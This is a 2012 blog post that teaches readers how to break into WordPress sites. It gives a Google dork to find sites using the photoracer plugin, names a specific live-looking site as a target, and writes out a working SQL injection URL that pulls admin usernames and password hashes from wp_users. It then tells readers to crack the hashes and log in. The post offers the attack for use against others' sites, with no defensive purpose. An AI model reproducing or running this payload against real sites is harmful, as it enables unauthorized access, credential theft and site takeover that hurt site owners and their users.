Simplest way to hack any Wordpress based site

Thursday, 12 January 2012

Simplest way to hack any Wordpress based site

Posted by Convex Coders at 15:40 Comments (1)

In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.

First we'll use this dork to search website with the help of Google

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

Results:

I'm now gonna test one of them..

For eg..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2

Now add the Exploit..

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

This is the exploit.. (GIVEN ABOVE)

And now the site address will become..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Now you can see the ADMIN and PASS....just crack the HASHES and you're done..

Site Admin Login page for WP

http://www.SITE-ADDRESS/wp-login.php

Comment (1)

Logging you in...

Dashboard | Edit profile | Logout

Logged in as

+1 Vote up Vote down

ConvexCoders 16p · 692 weeks ago

My best post ever..!! :D

Report

Post a new comment

Comment as a Guest, or login:

Go back

Share on Facebook

Connected as (Logout)

Email (optional)

Not displayed publicly.

Tweet this comment

Connected as (Logout)

Email (optional)

Not displayed publicly.

Submit Comment

Subscribe to

If you're having issues, Please leave a mail at convexcoders@gmail.com, and also don't forget to leave your blog URL. I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question. Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately! Thanks for reading, Convex Coders

Comments by IntenseDebate